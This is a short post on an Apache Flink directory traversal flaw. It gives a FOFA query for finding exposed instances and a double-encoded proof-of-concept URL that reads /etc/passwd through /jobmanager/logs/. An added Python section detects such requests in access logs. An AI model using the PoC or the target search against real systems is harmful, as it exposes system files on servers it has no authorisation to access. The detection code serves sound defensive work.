Apache Flink Directory Traversal Vulnerability

FOFA search syntax: app="Apache-Flink"

poc:
http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

 

The file was read successfully.
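As an added example (not part of the original post), the following Python check flags requests shaped like the PoC above in HTTP access logs: it percent-decodes the request path repeatedly, so the double-encoded `%252f` form is caught, and reports any `..` segment under `/jobmanager/logs/`. It assumes combined-format access logs from a reverse proxy in front of the Flink web UI; the log lines, client addresses and status codes are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed combined format, not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [07/Jan/2021:19:31:02 +0000] "GET /jobmanager/logs/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Jan/2021:19:32:10 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [07/Jan/2021:19:32:15 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fpasswd HTTP/1.1" 404 0',
    '10.0.0.7 - - [07/Jan/2021:19:33:40 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 90211',
    '10.0.0.7 - - [07/Jan/2021:19:34:00 +0000] "GET /jobs/overview HTTP/1.1" 200 77',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
LOG_PREFIX = "/jobmanager/logs/"


def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly until the value is stable; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def find_traversal(lines):
    """Return (client, raw_path, decode_rounds, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, raw_path, status = m.group(1), m.group(2), int(m.group(3))
        decoded, rounds = fully_decode(raw_path.split("?", 1)[0])
        if not decoded.startswith(LOG_PREFIX):
            continue
        # Any ".." segment left after full decoding points outside the log directory.
        segments = decoded[len(LOG_PREFIX):].replace("\\", "/").split("/")
        if ".." in segments:
            hits.append((client, raw_path, rounds, status))
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOGS):
        print(hit)
```

A hit with two decode rounds and a 200 status is the pattern that matches the PoC request and warrants checking which file was returned.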

 

posted @ 2021-01-07 19:40  !rbash